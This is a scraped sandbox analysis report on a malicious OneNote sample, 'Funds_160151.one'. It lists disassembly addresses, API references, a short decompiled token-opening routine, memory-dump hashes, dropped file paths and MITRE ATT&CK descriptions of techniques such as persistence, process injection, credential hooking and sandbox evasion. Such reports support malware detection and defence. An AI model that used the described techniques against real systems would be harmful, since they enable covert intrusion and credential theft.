0x00000000
0x00000000
0x100153e0
0x100153e5
0x100153e5
0x100153ea
0x100153f0
0x100153fa
0x100153ff
0x10015405
0x10015424
0x10015427
0x10015432
0x10015432
0x10015432
0x10015429
0x10015429
0x1001542b
0x00000000
0x1001542d
0x1001542d
0x1001542d
0x1001542b
0x1001543a
0x1001543f
0x10015444
0x1001544a
0x1001544e
0x10015451
0x10015454
0x1001545a
0x1001545f
0x10015462
0x10015468
0x1001546d
0x10015473
0x10015479
0x1001547e
0x10015481
0x10015486
0x1001548a
0x1001548e
0x10015491
0x10015494
0x1001549d
0x100154a4
0x100154a7
0x100154aa
0x100154af
0x100154b4
0x100154b7
0x100154ba
0x100154ba
0x100154be
0x100154c7
0x100154ce
0x100154d1
0x100154d6
0x100154db
0x100154db
0x100154de
0x100154e3
0x00000000
0x00000000
0x10015407
0x10015409
0x10015416
0x00000000
0x00000000
0x10015416
0x10015409
0x00000000
0x10015405
0x100154e9
0x100154ee
0x100154f1
0x100154f4
0x1001559f
0x1001559f
0x100154fa
0x100154fa
0x100154fa
0x100154ff
0x10015529
0x1001552c
0x1001552c
0x10015531
0x10015533
0x10015535
0x10015538
0x1001553b
0x10015543
0x10015548
0x10015548
0x1001554e
0x10015551
0x10015554
0x10015557
0x10015559
0x10015559
0x1001555a
0x1001555a
0x10015557
0x10015568
0x1001556b
0x1001556f
0x10015574
0x10015577
0x1001557a
0x1001557a
0x1001557a
0x1001557d
0x1001557d
0x10015580
0x10015580
0x10015501
0x10015501
0x10015511
0x10015514
0x10015519
0x10015519
0x1001551c
0x1001551f
0x10015522
0x10015524
0x10015524
0x10015583
0x10015585
0x10015588
0x10015588
0x1001558e
0x10015592
0x10015595
0x10015597
0x10015597
0x100155a8
0x100155aa
0x100155aa
0x100155b2
0x100155c0
0x100155c3
0x100155c5
0x100155e5
0x100155e5
0x100155e8
0x100155ee
0x100155ef
0x100155f2
0x100155f4
0x100155f7
0x100155fa
0x100155fd
0x10015601
0x10015604
0x10015607
0x1001560a
0x1001560c
0x1001560c
0x1001560f
0x10015611
0x10015611
0x10015614
0x10015616
0x10015619
0x10015621
0x10015624
0x10015629
0x10015629
0x1001562f
0x10015632
0x10015635
0x10015637
0x10015637
0x10015638
0x10015638
0x10015643
0x10015643
0x10015643
0x10015646
0x10015649
0x10015649
0x1001564c
0x1001564c
0x1001560f
0x1001564f
0x10015652
0x10015655
0x10015657
0x1001565a
0x1001565c
0x1001565f
0x10015662
0x10015664
0x10015667
0x1001566f
0x10015677
0x1001567a
0x1001567a
0x1001567a
0x1001567d
0x1001567d
0x1001567d
0x10015680
0x10015686
0x10015688
0x10015688
0x1001568e
0x10015694
0x1001569d
0x100156a4
0x100156a6
0x100156a9
0x100156a9
0x100156ac
0x100156ac
0x100156af
0x100156b1
0x100156b4
0x100156b6
0x100156d1
0x100156d1
0x100156d5
0x100156d8
0x100156db
0x100156de
0x100156f4
0x100156f4
0x100156f4
0x100156e0
0x100156e0
0x100156e2
0x100156e6
0x100156e9
0x00000000
0x100156eb
0x100156eb
0x100156ed
0x00000000
0x100156ef
0x100156ef
0x100156ef
0x100156ed
0x100156e9
0x100156f8
0x100156fb
0x10015700
0x1001570a
0x1001570a
0x1001570a
0x1001570d
0x100156b8
0x100156b8
0x100156ba
0x100156c1
0x100156c1
0x100156c3
0x100156c5
0x100156c7
0x100156cb
0x100156cd
0x100156cf
0x00000000
0x00000000
0x100156cf
0x100156cb
0x100156bc
0x100156bc
0x100156bf
0x00000000
0x00000000
0x100156bf
0x100156ba
0x10015717
0x10015719
0x10015719
0x10015724
0x100155c7
0x100155c7
0x100155ca
0x00000000
0x100155cc
0x100155cc
0x100155ce
0x100155d2
0x00000000
0x100155d4
0x100155d4
0x100155d4
0x100155d7
0x00000000
0x100155db
0x100155e4
0x100155e4
0x100155d7
0x100155d2
0x100155ca
0x100155b6
0x100155bf
0x100155bf

APIs

memcpy.MSVCRT ref: 1001549D
memcpy.MSVCRT ref: 10015514
memcpy.MSVCRT ref: 10015543
memcpy.MSVCRT ref: 1001556F
memcpy.MSVCRT ref: 10015624

Part of subcall function 100183B0: memcpy.MSVCRT ref: 1001848E

Part of subcall function 10017110: memcpy.MSVCRT ref: 1001713A

Memory Dump Source

Source File: 0000000F.00000002.2710231806.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000F.00000002.2710207572.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710384604.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710427976.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710458940.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: a15768640203d689b50e80daa63f56e2f1f27f81ff21523bef836df72f228821
Instruction ID: c03aa8aa18d0fbe9ba0a8144e32312481850ad9e2bb41e7d7b69b8a2636fcd53
Opcode Fuzzy Hash: a15768640203d689b50e80daa63f56e2f1f27f81ff21523bef836df72f228821
Instruction Fuzzy Hash: 2CD11575A00A00DFC724CF69D8D495AB7E2FF88345B69892DE88ACB751D732F984CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6936DF34 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

Scre_fullinfo.GB ref: 6936DF57

Memory Dump Source

Source File: 0000000F.00000002.2710520774.0000000069341000.00000020.00000001.01000000.00000005.sdmp, Offset: 69340000, based on PE: true

Associated: 0000000F.00000002.2710490868.0000000069340000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710821250.0000000069373000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710845657.0000000069374000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710845657.000000006937C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710992016.000000006938D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2711015348.000000006938E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2711040226.0000000069390000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2711185450.00000000693AB000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_69340000_rundll32.jbxd

Similarity

API ID: Scre_fullinfo
String ID:
API String ID: 3112101106-0
Opcode ID: c93dc1a74ea445240d4ae3283a74e48f723b520edb8a2083968d0829e9f80fb9
Instruction ID: 2f0f8ac4a6c77a6249221e324dc37063bf8a5fa34516ddaf34cd33c7e9f385e3
Opcode Fuzzy Hash: c93dc1a74ea445240d4ae3283a74e48f723b520edb8a2083968d0829e9f80fb9
Instruction Fuzzy Hash: 7241C570904219DFCB40CFA9C9447AEBBF0BB48344F10895AE464EB3A4D379D954CF91

Uniqueness

Uniqueness Score: -1.00%

Function 1000E425 Relevance: 6.0, APIs: 4, Instructions: 33
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000E425(void* __ecx) {
				void* _v8;
				void* _t10;
				intOrPtr _t13;

				if(OpenThreadToken(GetCurrentThread(), 8, 0,  &_v8) != 0) {
					L4:
					_t10 = _v8;
				} else {
					if(GetLastError() != 0x3f0) {
						L3:
						_t10 = 0;
					} else {
						_t13 =  *0x10020d58; // 0x4a5f900
						if(OpenProcessToken( *((intOrPtr*)(_t13 + 0x130))(), 8,  &_v8) != 0) {
							goto L4;
						} else {
							goto L3;
						}
					}
				}
				return _t10;
			}

0x1000e444
0x1000e476
0x1000e476
0x1000e446
0x1000e451
0x1000e472
0x1000e472
0x1000e453
0x1000e45d
0x1000e470
0x00000000
0x00000000
0x00000000
0x00000000
0x1000e470
0x1000e451
0x1000e47b

APIs

GetCurrentThread.KERNEL32 ref: 1000E438
OpenThreadToken.ADVAPI32(00000000,?,?,1000E56A,00000000,10000000), ref: 1000E43F
GetLastError.KERNEL32(?,?,1000E56A,00000000,10000000), ref: 1000E446
OpenProcessToken.ADVAPI32(00000000,?,?,1000E56A,00000000,10000000), ref: 1000E46B

Memory Dump Source

Source File: 0000000F.00000002.2710231806.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000F.00000002.2710207572.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710384604.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710427976.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710458940.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd

Similarity

API ID: OpenThreadToken$CurrentErrorLastProcess
String ID:
API String ID: 1515895013-0
Opcode ID: 4bc0d986f6800a7c46793aa933587504edcea6ea4c041a35c67ee97f7d79fe03
Instruction ID: dc40be8b8696f4cd8aae3a846ac2de8cb0550173adfbeab254a65d27bd2c8ac9
Opcode Fuzzy Hash: 4bc0d986f6800a7c46793aa933587504edcea6ea4c041a35c67ee97f7d79fe03
Instruction Fuzzy Hash: F0F01771644656ABFB40DBE48C88B9A77ECFB48390F114450FA82E3061D760EE408B60

Uniqueness

Uniqueness Score: -1.00%

Function 6934B536 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 448COMMON

Download Yara Rule

APIs

Spcre_ord2utf.GB ref: 6934BA4E

Strings

", xrefs: 6934B9A9
9, xrefs: 6934B679

Memory Dump Source

Source File: 0000000F.00000002.2710520774.0000000069341000.00000020.00000001.01000000.00000005.sdmp, Offset: 69340000, based on PE: true

Associated: 0000000F.00000002.2710490868.0000000069340000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710821250.0000000069373000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710845657.0000000069374000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710845657.000000006937C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710992016.000000006938D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2711015348.000000006938E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2711040226.0000000069390000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2711185450.00000000693AB000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_69340000_rundll32.jbxd

Similarity

API ID: Spcre_ord2utf
String ID: "$9
API String ID: 2386214801-1785012786
Opcode ID: 1c102efb01908e3025367ebddb724c30be7ac19a5bebe967fdb5c6f1c95b317a
Instruction ID: cac0eb53969d93db26724e6844d53edc3ff5712cee5a533c54c1469f8d48d3a8
Opcode Fuzzy Hash: 1c102efb01908e3025367ebddb724c30be7ac19a5bebe967fdb5c6f1c95b317a
Instruction Fuzzy Hash: B012E275A442698FDB60CF28C880B9DBBF1BB4A704F1241E6E858AB351D736DE85CF11

Uniqueness

Uniqueness Score: -1.00%

Function 6934AB36 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 247COMMON

Download Yara Rule

Strings

+, xrefs: 6934ACE3
), xrefs: 6934AB36

Memory Dump Source

Source File: 0000000F.00000002.2710520774.0000000069341000.00000020.00000001.01000000.00000005.sdmp, Offset: 69340000, based on PE: true

Associated: 0000000F.00000002.2710490868.0000000069340000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710821250.0000000069373000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710845657.0000000069374000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710845657.000000006937C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710992016.000000006938D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2711015348.000000006938E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2711040226.0000000069390000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2711185450.00000000693AB000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_69340000_rundll32.jbxd

Similarity

API ID:
String ID: )$+
API String ID: 0-2508831899
Opcode ID: 53bd7514d88783a3749d3b90285573761fe62f8689b182cb6d92a23f7fbe4037
Instruction ID: dee43e2518805977d30bcdb0612ec7d7bd44b5426b8b48ecf227347456f986f0
Opcode Fuzzy Hash: 53bd7514d88783a3749d3b90285573761fe62f8689b182cb6d92a23f7fbe4037
Instruction Fuzzy Hash: 34C1E275A442698FCBA0CF19C880B99BBF1BB4A315F4640E5E8A8EB351D3359EC1DF11

Uniqueness

Uniqueness Score: -1.00%

Function 6935EA5C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

Spcre_ord2utf.GB ref: 6935ED2C

Strings

-, xrefs: 6935EA6B
-, xrefs: 6935ECB9

Memory Dump Source

Source File: 0000000F.00000002.2710520774.0000000069341000.00000020.00000001.01000000.00000005.sdmp, Offset: 69340000, based on PE: true

Associated: 0000000F.00000002.2710490868.0000000069340000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710821250.0000000069373000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710845657.0000000069374000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710845657.000000006937C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710992016.000000006938D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2711015348.000000006938E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2711040226.0000000069390000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2711185450.00000000693AB000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_69340000_rundll32.jbxd

Similarity

API ID: Spcre_ord2utf
String ID: -$-
API String ID: 2386214801-2078519666
Opcode ID: 9c27036320733e4638026f8ccc566485371b5ac00e94e430021dcdb9fcc3facd
Instruction ID: 3e5d8ca9498a0678a438d22df031d9ab7c365247f1d65f927effdcfebb4ea575
Opcode Fuzzy Hash: 9c27036320733e4638026f8ccc566485371b5ac00e94e430021dcdb9fcc3facd
Instruction Fuzzy Hash: 79519B71A04359DFCB20CFA9C484AADBBF1FB49315F14806AE869DB241D339DA95DF10

Uniqueness

Uniqueness Score: -1.00%

Function 69372650 Relevance: 5.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 6937265E
TlsGetValue.KERNEL32 ref: 69372685
GetLastError.KERNEL32 ref: 6937268C
LeaveCriticalSection.KERNEL32 ref: 693726AC

Memory Dump Source

Source File: 0000000F.00000002.2710520774.0000000069341000.00000020.00000001.01000000.00000005.sdmp, Offset: 69340000, based on PE: true

Associated: 0000000F.00000002.2710490868.0000000069340000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710821250.0000000069373000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710845657.0000000069374000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710845657.000000006937C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710992016.000000006938D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2711015348.000000006938E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2711040226.0000000069390000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2711185450.00000000693AB000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_69340000_rundll32.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeaveValue
String ID:
API String ID: 682475483-0
Opcode ID: 8852aac37c6fd83e67a81a8a7705b6a0a19c3db9ddd8cb4d70b2c930beee8ff0
Instruction ID: 455d058e190500b25c4036b5ce58305cdaa5a743c53bd03fa708557c2ea23cbd
Opcode Fuzzy Hash: 8852aac37c6fd83e67a81a8a7705b6a0a19c3db9ddd8cb4d70b2c930beee8ff0
Instruction Fuzzy Hash: 90F0A4B69043408BDF20BFB9D7C651A7BB8FA46700B050529DD944B204DA75A406CBA3

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Funds_160151.one

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Data Obfuscation

Snort Signatures

Joe Sandbox Signatures

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\gb.jpg

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\1E906F6A-A954-476D-9938-3DC6D5700ACA

C:\Users\user\AppData\Local\Microsoft\Office\16.0\onenote.exe_Rules.xml

C:\Users\user\AppData\Local\Microsoft\Office\OTele\onenote.exe.db

C:\Users\user\AppData\Local\Microsoft\Office\OTele\onenote.exe.db-journal

C:\Users\user\AppData\Local\Microsoft\Office\OTele\onenote.exe.db-shm

C:\Users\user\AppData\Local\Microsoft\Office\OTele\onenote.exe.db-wal

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\Backup\My Notebook\Quick Notes.one (On 07-02-2023).one (copy)

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\Backup\My Notebook\~Quick Notes.one.onebackupconstruction

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\Backup\Open Sections\Funds_160151.one (On 07-02-2023).one (copy)

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\Backup\Open Sections\~Funds_160151.one.onebackupconstruction

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000000.bin

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000001.bin (copy)

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000002.bin (copy)

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000003.bin (copy)

Windows Analysis Report
Funds_160151.one

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

